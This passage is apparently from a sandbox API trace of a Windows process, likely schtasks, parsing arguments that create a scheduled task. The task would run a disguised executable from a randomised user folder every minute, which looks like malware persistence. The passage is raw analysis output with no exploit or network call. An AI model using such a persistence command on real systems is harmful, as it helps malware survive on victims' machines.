0x0 [0211.953] RtlRestoreLastWin32Error () returned 0x490 [0211.953] RtlRestoreLastWin32Error () returned 0x0 [0211.953] lstrlenW (lpString="/tr") returned 3 [0211.953] GetProcessHeap () returned 0x1b0000 [0211.953] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x8) returned 0x1b2810 [0211.953] GetProcessHeap () returned 0x1b0000 [0211.953] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1b96d0 [0211.953] RtlRestoreLastWin32Error () returned 0x0 [0211.953] RtlRestoreLastWin32Error () returned 0x0 [0211.953] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\btpanui\\SystemPropertiesPerformance.exe") returned 61 [0211.953] lstrlenW (lpString="-/") returned 2 [0211.953] StrChrIW (lpStart="-/", wMatch=0x4630043) returned 0x0 [0211.953] RtlRestoreLastWin32Error () returned 0x490 [0211.953] RtlRestoreLastWin32Error () returned 0x490 [0211.954] RtlRestoreLastWin32Error () returned 0x0 [0211.954] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\btpanui\\SystemPropertiesPerformance.exe") returned 61 [0211.954] StrChrIW (lpStart="C:\\Users\\RDhJ0CNFevzX\\btpanui\\SystemPropertiesPerformance.exe", wMatch=0x3a) returned=":\\Users\\RDhJ0CNFevzX\\btpanui\\SystemPropertiesPerformance.exe" [0211.954] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\btpanui\\SystemPropertiesPerformance.exe") returned 61 [0211.954] GetProcessHeap () returned 0x1b0000 [0211.954] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x10) returned 0x1b73f0 [0211.954] _memicmp (_Buf1=0x1b73f0, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.954] GetProcessHeap () returned 0x1b0000 [0211.954] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0xc) returned 0x1b7420 [0211.954] GetProcessHeap () returned 0x1b0000 [0211.954] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x10) returned 0x1b7480 [0211.954] _memicmp (_Buf1=0x1b7480, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.954] GetProcessHeap () returned 0x1b0000 [0211.954] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x80) returned 0x1ba9e8 [0211.954] RtlRestoreLastWin32Error () returned 0x7a [0211.954] RtlRestoreLastWin32Error () returned 0x0 [0211.954] RtlRestoreLastWin32Error () returned 0x0 [0211.954] lstrlenW (lpString="C") returned 1 [0211.954] RtlRestoreLastWin32Error () returned 0x490 [0211.954] RtlRestoreLastWin32Error () returned 0x0 [0211.954] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\btpanui\\SystemPropertiesPerformance.exe") returned 61 [0211.954] GetProcessHeap () returned 0x1b0000 [0211.954] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x7c) returned 0x1baa70 [0211.955] GetProcessHeap () returned 0x1b0000 [0211.955] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1b9510 [0211.955] RtlRestoreLastWin32Error () returned 0x0 [0211.955] RtlRestoreLastWin32Error () returned 0x0 [0211.955] lstrlenW (lpString="/sc") returned 3 [0211.955] lstrlenW (lpString="-/") returned 2 [0211.955] StrChrIW (lpStart="-/", wMatch=0x463002f) returned="/" [0211.955] lstrlenW (lpString="?") returned 1 [0211.955] lstrlenW (lpString="?") returned 1 [0211.955] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.955] lstrlenW (lpString="sc") returned 2 [0211.955] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.956] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|?|") returned 3 [0211.956] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|sc|") returned 4 [0211.956] lstrlenW (lpString="|?|") returned 3 [0211.956] lstrlenW (lpString="|sc|") returned 4 [0211.956] RtlRestoreLastWin32Error () returned 0x490 [0211.956] lstrlenW (lpString="create") returned 6 [0211.956] lstrlenW (lpString="create") returned 6 [0211.956] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.956] lstrlenW (lpString="sc") returned 2 [0211.956] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.956] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|create|") returned 8 [0211.956] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|sc|") returned 4 [0211.956] lstrlenW (lpString="|create|") returned 8 [0211.956] lstrlenW (lpString="|sc|") returned 4 [0211.957] StrStrIW (lpFirst="|create|", lpSrch="|sc|") returned 0x0 [0211.957] RtlRestoreLastWin32Error () returned 0x490 [0211.957] lstrlenW (lpString="delete") returned 6 [0211.957] lstrlenW (lpString="delete") returned 6 [0211.957] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.957] lstrlenW (lpString="sc") returned 2 [0211.957] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.957] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|delete|") returned 8 [0211.957] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|sc|") returned 4 [0211.957] lstrlenW (lpString="|delete|") returned 8 [0211.957] lstrlenW (lpString="|sc|") returned 4 [0211.957] StrStrIW (lpFirst="|delete|", lpSrch="|sc|") returned 0x0 [0211.957] RtlRestoreLastWin32Error () returned 0x490 [0211.957] lstrlenW (lpString="query") returned 5 [0211.957] lstrlenW (lpString="query") returned 5 [0211.957] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.958] lstrlenW (lpString="sc") returned 2 [0211.958] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.958] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x8, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|query|") returned 7 [0211.958] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|sc|") returned 4 [0211.958] lstrlenW (lpString="|query|") returned 7 [0211.958] lstrlenW (lpString="|sc|") returned 4 [0211.958] StrStrIW (lpFirst="|query|", lpSrch="|sc|") returned 0x0 [0211.958] RtlRestoreLastWin32Error () returned 0x490 [0211.958] lstrlenW (lpString="change") returned 6 [0211.958] lstrlenW (lpString="change") returned 6 [0211.958] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.958] lstrlenW (lpString="sc") returned 2 [0211.958] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.958] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|change|") returned 8 [0211.958] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|sc|") returned 4 [0211.958] lstrlenW (lpString="|change|") returned 8 [0211.958] lstrlenW (lpString="|sc|") returned 4 [0211.958] StrStrIW (lpFirst="|change|", lpSrch="|sc|") returned 0x0 [0211.958] RtlRestoreLastWin32Error () returned 0x490 [0211.959] lstrlenW (lpString="run") returned 3 [0211.959] lstrlenW (lpString="run") returned 3 [0211.959] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.959] lstrlenW (lpString="sc") returned 2 [0211.959] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.959] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|run|") returned 5 [0211.959] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|sc|") returned 4 [0211.959] lstrlenW (lpString="|run|") returned 5 [0211.959] lstrlenW (lpString="|sc|") returned 4 [0211.959] StrStrIW (lpFirst="|run|", lpSrch="|sc|") returned 0x0 [0211.959] RtlRestoreLastWin32Error () returned 0x490 [0211.959] lstrlenW (lpString="end") returned 3 [0211.959] lstrlenW (lpString="end") returned 3 [0211.959] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.959] lstrlenW (lpString="sc") returned 2 [0211.959] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.959] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|end|") returned 5 [0211.959] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|sc|") returned 4 [0211.960] lstrlenW (lpString="|end|") returned 5 [0211.960] lstrlenW (lpString="|sc|") returned 4 [0211.960] StrStrIW (lpFirst="|end|", lpSrch="|sc|") returned 0x0 [0211.960] RtlRestoreLastWin32Error () returned 0x490 [0211.960] lstrlenW (lpString="showsid") returned 7 [0211.960] lstrlenW (lpString="showsid") returned 7 [0211.960] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.960] lstrlenW (lpString="sc") returned 2 [0211.960] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.960] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0xa, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|showsid|") returned 9 [0211.960] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|sc|") returned 4 [0211.960] lstrlenW (lpString="|showsid|") returned 9 [0211.960] lstrlenW (lpString="|sc|") returned 4 [0211.960] StrStrIW (lpFirst="|showsid|", lpSrch="|sc|") returned 0x0 [0211.960] RtlRestoreLastWin32Error () returned 0x490 [0211.960] RtlRestoreLastWin32Error () returned 0x490 [0211.960] RtlRestoreLastWin32Error () returned 0x0 [0211.960] lstrlenW (lpString="/sc") returned 3 [0211.960] StrChrIW (lpStart="/sc", wMatch=0x3a) returned 0x0 [0211.960] RtlRestoreLastWin32Error () returned 0x490 [0211.960] RtlRestoreLastWin32Error () returned 0x0 [0211.961] lstrlenW (lpString="/sc") returned 3 [0211.961] GetProcessHeap () returned 0x1b0000 [0211.961] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x8) returned 0x1b6680 [0211.961] GetProcessHeap () returned 0x1b0000 [0211.961] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1b93f0 [0211.961] RtlRestoreLastWin32Error () returned 0x0 [0211.961] RtlRestoreLastWin32Error () returned 0x0 [0211.961] lstrlenW (lpString="minute") returned 6 [0211.961] lstrlenW (lpString="-/") returned 2 [0211.961] StrChrIW (lpStart="-/", wMatch=0x463006d) returned 0x0 [0211.961] RtlRestoreLastWin32Error () returned 0x490 [0211.961] RtlRestoreLastWin32Error () returned 0x490 [0211.961] RtlRestoreLastWin32Error () returned 0x0 [0211.961] lstrlenW (lpString="minute") returned 6 [0211.961] StrChrIW (lpStart="minute", wMatch=0x3a) returned 0x0 [0211.961] RtlRestoreLastWin32Error () returned 0x490 [0211.961] RtlRestoreLastWin32Error () returned 0x0 [0211.961] lstrlenW (lpString="minute") returned 6 [0211.961] GetProcessHeap () returned 0x1b0000 [0211.961] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0xe) returned 0x1baca8 [0211.961] GetProcessHeap () returned 0x1b0000 [0211.961] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1b9610 [0211.961] RtlRestoreLastWin32Error () returned 0x0 [0211.962] RtlRestoreLastWin32Error () returned 0x0 [0211.962] lstrlenW (lpString="/mo") returned 3 [0211.962] lstrlenW (lpString="-/") returned 2 [0211.962] StrChrIW (lpStart="-/", wMatch=0x463002f) returned="/" [0211.962] lstrlenW (lpString="?") returned 1 [0211.962] lstrlenW (lpString="?") returned 1 [0211.962] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.962] lstrlenW (lpString="mo") returned 2 [0211.962] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.962] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|?|") returned 3 [0211.962] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|mo|") returned 4 [0211.969] lstrlenW (lpString="|?|") returned 3 [0211.969] lstrlenW (lpString="|mo|") returned 4 [0211.969] RtlRestoreLastWin32Error () returned 0x490 [0211.969] lstrlenW (lpString="create") returned 6 [0211.969] lstrlenW (lpString="create") returned 6 [0211.969] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.969] lstrlenW (lpString="mo") returned 2 [0211.969] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.969] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|create|") returned 8 [0211.969] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|mo|") returned 4 [0211.969] lstrlenW (lpString="|create|") returned 8 [0211.969] lstrlenW (lpString="|mo|") returned 4 [0211.969] StrStrIW (lpFirst="|create|", lpSrch="|mo|") returned 0x0 [0211.969] RtlRestoreLastWin32Error () returned 0x490 [0211.969] lstrlenW (lpString="delete") returned 6 [0211.969] lstrlenW (lpString="delete") returned 6 [0211.969] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.970] lstrlenW (lpString="mo") returned 2 [0211.970] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0211.970] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|delete|") returned 8 [0211.970] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|mo|") returned 4 [0211.970] lstrlenW (lpString="|delete|") returned 8 [0211.970] lstrlenW (lpString="|mo|") returned 4 [0211.970] StrStrIW (lpFirst="|delete|", lpSrch="|mo|") returned 0x0 [0211.970] RtlRestoreLastWin32Error () returned 0x490 [0211.970] lstrlenW (lpString="query") returned 5 [0211.970] lstrlenW (lpString="query") returned 5 [0211.970] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.023] lstrlenW (lpString="mo") returned 2 [0212.024] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.024] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x8, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|query|") returned 7 [0212.024] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|mo|") returned 4 [0212.024] lstrlenW (lpString="|query|") returned 7 [0212.024] lstrlenW (lpString="|mo|") returned 4 [0212.024] StrStrIW (lpFirst="|query|", lpSrch="|mo|") returned 0x0 [0212.024] RtlRestoreLastWin32Error () returned 0x490 [0212.024] lstrlenW (lpString="change") returned 6 [0212.024] lstrlenW (lpString="change") returned 6 [0212.024] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.024] lstrlenW (lpString="mo") returned 2 [0212.024] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.025] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|change|") returned 8 [0212.025] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|mo|") returned 4 [0212.025] lstrlenW (lpString="|change|") returned 8 [0212.025] lstrlenW (lpString="|mo|") returned 4 [0212.025] StrStrIW (lpFirst="|change|", lpSrch="|mo|") returned 0x0 [0212.025] RtlRestoreLastWin32Error () returned 0x490 [0212.025] lstrlenW (lpString="run") returned 3 [0212.025] lstrlenW (lpString="run") returned 3 [0212.025] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.025] lstrlenW (lpString="mo") returned 2 [0212.025] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.025] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|run|") returned 5 [0212.025] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|mo|") returned 4 [0212.025] lstrlenW (lpString="|run|") returned 5 [0212.025] lstrlenW (lpString="|mo|") returned 4 [0212.025] StrStrIW (lpFirst="|run|", lpSrch="|mo|") returned 0x0 [0212.025] RtlRestoreLastWin32Error () returned 0x490 [0212.025] lstrlenW (lpString="end") returned 3 [0212.025] lstrlenW (lpString="end") returned 3 [0212.026] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.026] lstrlenW (lpString="mo") returned 2 [0212.026] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.026] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|end|") returned 5 [0212.026] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|mo|") returned 4 [0212.026] lstrlenW (lpString="|end|") returned 5 [0212.026] lstrlenW (lpString="|mo|") returned 4 [0212.026] StrStrIW (lpFirst="|end|", lpSrch="|mo|") returned 0x0 [0212.026] RtlRestoreLastWin32Error () returned 0x490 [0212.026] lstrlenW (lpString="showsid") returned 7 [0212.026] lstrlenW (lpString="showsid") returned 7 [0212.026] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.026] lstrlenW (lpString="mo") returned 2 [0212.026] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.027] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0xa, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|showsid|") returned 9 [0212.027] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|mo|") returned 4 [0212.027] lstrlenW (lpString="|showsid|") returned 9 [0212.027] lstrlenW (lpString="|mo|") returned 4 [0212.027] StrStrIW (lpFirst="|showsid|", lpSrch="|mo|") returned 0x0 [0212.027] RtlRestoreLastWin32Error () returned 0x490 [0212.027] RtlRestoreLastWin32Error () returned 0x490 [0212.027] RtlRestoreLastWin32Error () returned 0x0 [0212.027] lstrlenW (lpString="/mo") returned 3 [0212.027] StrChrIW (lpStart="/mo", wMatch=0x3a) returned 0x0 [0212.027] RtlRestoreLastWin32Error () returned 0x490 [0212.027] RtlRestoreLastWin32Error () returned 0x0 [0212.027] lstrlenW (lpString="/mo") returned 3 [0212.027] GetProcessHeap () returned 0x1b0000 [0212.027] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x8) returned 0x1b68e8 [0212.027] GetProcessHeap () returned 0x1b0000 [0212.027] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1b9630 [0212.027] RtlRestoreLastWin32Error () returned 0x0 [0212.028] RtlRestoreLastWin32Error () returned 0x0 [0212.028] lstrlenW (lpString="1") returned 1 [0212.028] RtlRestoreLastWin32Error () returned 0x490 [0212.028] RtlRestoreLastWin32Error () returned 0x0 [0212.028] lstrlenW (lpString="1") returned 1 [0212.028] StrChrIW (lpStart="1", wMatch=0x3a) returned 0x0 [0212.028] RtlRestoreLastWin32Error () returned 0x490 [0212.028] RtlRestoreLastWin32Error () returned 0x0 [0212.029] lstrlenW (lpString="1") returned 1 [0212.029] GetProcessHeap () returned 0x1b0000 [0212.029] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x4) returned 0x1b6bf8 [0212.029] GetProcessHeap () returned 0x1b0000 [0212.029] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1b9410 [0212.029] RtlRestoreLastWin32Error () returned 0x0 [0212.029] RtlRestoreLastWin32Error () returned 0x0 [0212.029] lstrlenW (lpString="/F") returned 2 [0212.029] lstrlenW (lpString="-/") returned 2 [0212.029] StrChrIW (lpStart="-/", wMatch=0x463002f) returned="/" [0212.029] lstrlenW (lpString="?") returned 1 [0212.029] lstrlenW (lpString="?") returned 1 [0212.029] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.029] lstrlenW (lpString="F") returned 1 [0212.029] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.029] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|?|") returned 3 [0212.029] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|F|") returned 3 [0212.029] lstrlenW (lpString="|?|") returned 3 [0212.029] lstrlenW (lpString="|F|") returned 3 [0212.030] StrStrIW (lpFirst="|?|", lpSrch="|F|") returned 0x0 [0212.260] RtlRestoreLastWin32Error () returned 0x490 [0212.260] lstrlenW (lpString="create") returned 6 [0212.260] lstrlenW (lpString="create") returned 6 [0212.260] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.260] lstrlenW (lpString="F") returned 1 [0212.260] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.260] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|create|") returned 8 [0212.261] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|F|") returned 3 [0212.261] lstrlenW (lpString="|create|") returned 8 [0212.261] lstrlenW (lpString="|F|") returned 3 [0212.261] StrStrIW (lpFirst="|create|", lpSrch="|F|") returned 0x0 [0212.261] RtlRestoreLastWin32Error () returned 0x490 [0212.261] lstrlenW (lpString="delete") returned 6 [0212.261] lstrlenW (lpString="delete") returned 6 [0212.261] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.261] lstrlenW (lpString="F") returned 1 [0212.261] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.261] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|delete|") returned 8 [0212.261] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|F|") returned 3 [0212.261] lstrlenW (lpString="|delete|") returned 8 [0212.261] lstrlenW (lpString="|F|") returned 3 [0212.261] StrStrIW (lpFirst="|delete|", lpSrch="|F|") returned 0x0 [0212.262] RtlRestoreLastWin32Error () returned 0x490 [0212.262] lstrlenW (lpString="query") returned 5 [0212.262] lstrlenW (lpString="query") returned 5 [0212.262] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.262] lstrlenW (lpString="F") returned 1 [0212.262] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.262] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x8, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|query|") returned 7 [0212.262] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|F|") returned 3 [0212.262] lstrlenW (lpString="|query|") returned 7 [0212.262] lstrlenW (lpString="|F|") returned 3 [0212.262] StrStrIW (lpFirst="|query|", lpSrch="|F|") returned 0x0 [0212.262] RtlRestoreLastWin32Error () returned 0x490 [0212.263] lstrlenW (lpString="change") returned 6 [0212.263] lstrlenW (lpString="change") returned 6 [0212.263] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.263] lstrlenW (lpString="F") returned 1 [0212.263] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.263] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|change|") returned 8 [0212.263] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|F|") returned 3 [0212.263] lstrlenW (lpString="|change|") returned 8 [0212.263] lstrlenW (lpString="|F|") returned 3 [0212.263] StrStrIW (lpFirst="|change|", lpSrch="|F|") returned 0x0 [0212.263] RtlRestoreLastWin32Error () returned 0x490 [0212.263] lstrlenW (lpString="run") returned 3 [0212.263] lstrlenW (lpString="run") returned 3 [0212.263] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.263] lstrlenW (lpString="F") returned 1 [0212.264] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.264] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|run|") returned 5 [0212.264] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|F|") returned 3 [0212.264] lstrlenW (lpString="|run|") returned 5 [0212.264] lstrlenW (lpString="|F|") returned 3 [0212.264] StrStrIW (lpFirst="|run|", lpSrch="|F|") returned 0x0 [0212.264] RtlRestoreLastWin32Error () returned 0x490 [0212.264] lstrlenW (lpString="end") returned 3 [0212.265] lstrlenW (lpString="end") returned 3 [0212.265] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.265] lstrlenW (lpString="F") returned 1 [0212.265] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.265] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|end|") returned 5 [0212.265] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|F|") returned 3 [0212.265] lstrlenW (lpString="|end|") returned 5 [0212.265] lstrlenW (lpString="|F|") returned 3 [0212.265] StrStrIW (lpFirst="|end|", lpSrch="|F|") returned 0x0 [0212.265] RtlRestoreLastWin32Error () returned 0x490 [0212.265] lstrlenW (lpString="showsid") returned 7 [0212.265] lstrlenW (lpString="showsid") returned 7 [0212.265] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.265] lstrlenW (lpString="F") returned 1 [0212.265] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.265] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0xa, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|showsid|") returned 9 [0212.265] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|F|") returned 3 [0212.266] lstrlenW (lpString="|showsid|") returned 9 [0212.266] lstrlenW (lpString="|F|") returned 3 [0212.266] StrStrIW (lpFirst="|showsid|", lpSrch="|F|") returned 0x0 [0212.266] RtlRestoreLastWin32Error () returned 0x490 [0212.266] RtlRestoreLastWin32Error () returned 0x490 [0212.266] RtlRestoreLastWin32Error () returned 0x0 [0212.266] lstrlenW (lpString="/F") returned 2 [0212.268] StrChrIW (lpStart="/F", wMatch=0x3a) returned 0x0 [0212.268] RtlRestoreLastWin32Error () returned 0x490 [0212.268] RtlRestoreLastWin32Error () returned 0x0 [0212.268] lstrlenW (lpString="/F") returned 2 [0212.268] GetProcessHeap () returned 0x1b0000 [0212.268] RtlAllocateHeap 